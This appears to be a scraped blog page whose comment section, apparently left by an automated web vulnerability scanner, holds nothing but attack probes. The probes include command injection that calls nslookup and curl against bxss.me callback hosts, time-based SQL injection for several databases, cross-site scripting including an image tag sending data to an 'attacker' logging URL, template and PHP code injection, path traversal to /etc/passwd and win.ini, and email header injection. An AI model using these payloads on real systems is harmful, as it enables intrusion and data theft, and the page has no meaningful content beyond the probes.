“+”A”.concat(70-3).concat(22*4).concat(121).concat(73).concat(99).concat(82)+(require”socket” Socket.gethostbyname(“hitok”+”dwbtftyg2678d.bxss.me.”)[3].to_s)+” Responder
&(nslookup -q=cname hitkncefzgewq86592.bxss.me||curl hitkncefzgewq86592.bxss.me)&’\”`0&(nslookup -q=cname hitkncefzgewq86592.bxss.me||curl hitkncefzgewq86592.bxss.me)&`’ Responder
‘.gethostbyname(lc(‘hitbl’.’cteoeyxl991a3.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(106).chr(84).chr(116).chr(73).’ Responder
&(nslookup -q=cname hitbokfxiuvyu7572d.bxss.me||curl hitbokfxiuvyu7572d.bxss.me)&’\”`0&(nslookup -q=cname hitbokfxiuvyu7572d.bxss.me||curl hitbokfxiuvyu7572d.bxss.me)&`’ Responder
“.gethostbyname(lc(“hitxt”.”jqwdbcqw64d92.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(122).chr(84).chr(119).chr(77).” Responder
“+”A”.concat(70-3).concat(22*4).concat(119).concat(80).concat(98).concat(72)+(require”socket” Socket.gethostbyname(“hittu”+”gknwabiye8a1a.bxss.me.”)[3].to_s)+” Responder
echo litzox$()\ qzxkzu\nz^xyu||a #’ &echo litzox$()\ qzxkzu\nz^xyu||a #|” &echo litzox$()\ qzxkzu\nz^xyu||a # Responder
|echo ytcwur$()\ yaprhg\nz^xyu||a #’ |echo ytcwur$()\ yaprhg\nz^xyu||a #|” |echo ytcwur$()\ yaprhg\nz^xyu||a # Responder
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%6F%70%46%28%39%34%39%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E Responder
170 thoughts on “aa”
1
555
555
1
“+”A”.concat(70-3).concat(22*4).concat(121).concat(73).concat(99).concat(82)+(require”socket”
Socket.gethostbyname(“hitok”+”dwbtftyg2678d.bxss.me.”)[3].to_s)+”
555
1
http://bxss.me/t/xss.html?%00
555
1
555
555
1
file:///etc/passwd
‘+response.write(9478949*9590595)+’
“+response.write(9478949*9590595)+”
1
&(nslookup -q=cname hitkncefzgewq86592.bxss.me||curl hitkncefzgewq86592.bxss.me)&’\”`0&(nslookup -q=cname hitkncefzgewq86592.bxss.me||curl hitkncefzgewq86592.bxss.me)&`’
1
|(nslookup -q=cname hityajfnmocjhfb687.bxss.me||curl hityajfnmocjhfb687.bxss.me)
1
1*1
1’&&sleep(27*1000)*gvlhfd&&’
-1 OR 3+445-445-1=0+0+0+1
‘.gethostbyname(lc(‘hitbl’.’cteoeyxl991a3.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(106).chr(84).chr(116).chr(73).’
1’||sleep(27*1000)*ujzfrc||’
if(now()=sysdate(),sleep(15),0)
555
${@print(md5(31337))}
${@print(md5(31337))}\
‘.print(md5(31337)).’
555
0″XOR(if(now()=sysdate(),sleep(15),0))XOR”Z
555
1
-1); waitfor delay ‘0:0:15’ —
1
555
555
555
555
555
555
555
‘+response.write(9739835*9254237)+’
)
555
!(()&&!|*|*|
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
../555
xfs.bxss.me
555
555
555
555′”()&%BooB(9277)
12345′”\’\”);|]*{
”💡
‘”()&%BooB(9411)
555’&&sleep(27*1000)*wsdgvb&&’
&(nslookup -q=cname hitbokfxiuvyu7572d.bxss.me||curl hitbokfxiuvyu7572d.bxss.me)&’\”`0&(nslookup -q=cname hitbokfxiuvyu7572d.bxss.me||curl hitbokfxiuvyu7572d.bxss.me)&`’
`(nslookup -q=cname hitjjmrknuvyd85643.bxss.me||curl hitjjmrknuvyd85643.bxss.me)`
5559783566
1*555
${9999790+10000222}
bfgx10267z1z2abcxhjl10267
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
http://bxss.me/t/fit.txt
555
555
bxss.me
555
dfb[[${98991*97996}]]xca
-1)); waitfor delay ‘0:0:15’ —
555BooB(9416)
555UOELS[!+!]
555BooB(9096)
1
1
555BooB(9112)
ipw6paau’); waitfor delay ‘0:0:15’ —
555
555
1
555
5L1qZKfd
555
-1)) OR 44=(SELECT 44 FROM PG_SLEEP(15))–
wp-comments-post.php
response.write(9873300*9963692)
555
555
bcc:009247.20148-12485.20148.5c916.19779.2@bxss.me
“.gethostbyname(lc(“hitxt”.”jqwdbcqw64d92.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(122).chr(84).chr(119).chr(77).”
555
555
555
555
555<aN34NRh<
‘”
555
555
555
555
1′”
555
“+”A”.concat(70-3).concat(22*4).concat(119).concat(80).concat(98).concat(72)+(require”socket”
Socket.gethostbyname(“hittu”+”gknwabiye8a1a.bxss.me.”)[3].to_s)+”
‘+response.write(9426396*9680330)+’
555′”()&%pZx9(9408)
echo litzox$()\ qzxkzu\nz^xyu||a #’ &echo litzox$()\ qzxkzu\nz^xyu||a #|” &echo litzox$()\ qzxkzu\nz^xyu||a #
‘”()&%pZx9(9918)
|echo ytcwur$()\ yaprhg\nz^xyu||a #’ |echo ytcwur$()\ yaprhg\nz^xyu||a #|” |echo ytcwur$()\ yaprhg\nz^xyu||a #
./555
555&n930814=v908970
‘”()
to@example.com>
bcc:009247.20148-12507.20148.5c916.19779.2@bxss.me
555’&&sleep(27*1000)*tppqkz&&’
`(nslookup -q=cname hithigxguutxa030ad.bxss.me||curl hithigxguutxa030ad.bxss.me)`
555’||sleep(27*1000)*kyyypk||’
555″||sleep(27*1000)*fnmonb||”
http://bxss.me/t/fit.txt?.jpg
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
1*555
‘”()
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
${@print(md5(31337))}
555’&&sleep(27*1000)*kjbbsg&&’
${@print(md5(31337))}\
555*354*349*0
<!–
‘”()&%XNgf(9883)
0’XOR(if(now()=sysdate(),sleep(15),0))XOR’Z
(699-139-5)
1
1
-1; waitfor delay ‘0:0:15’ —
‘”()&%SopF(9635)
19055654
-1); waitfor delay ‘0:0:15’ —
bfg4283%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4283
-1)); waitfor delay ‘0:0:15’ —
555
<th:t="${dfb}#foreach
1 waitfor delay ‘0:0:15’ —
1
dfb{{98991*97996}}xca
BgpVMimN’); waitfor delay ‘0:0:15’ —
dfb__${98991*97996}__::.x
HvPSngcl’)); waitfor delay ‘0:0:15’ —
1SopF(9661)
1 waitfor delay ‘0:0:15’ —
-5) OR 340=(SELECT 340 FROM PG_SLEEP(15))–
1HNVFE[!+!]
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%53%6F%70%46%28%39%34%39%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1SopF(9020)
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1″ onerror=alert(9323)>
1<ScRiPt>SopF(9482)</sCripT>
1}body{zzz:Expre/**/SSion(SopF(9416))}
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1<img sRc='http://attacker-9563/log.php?
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
1
1%2527%2522
1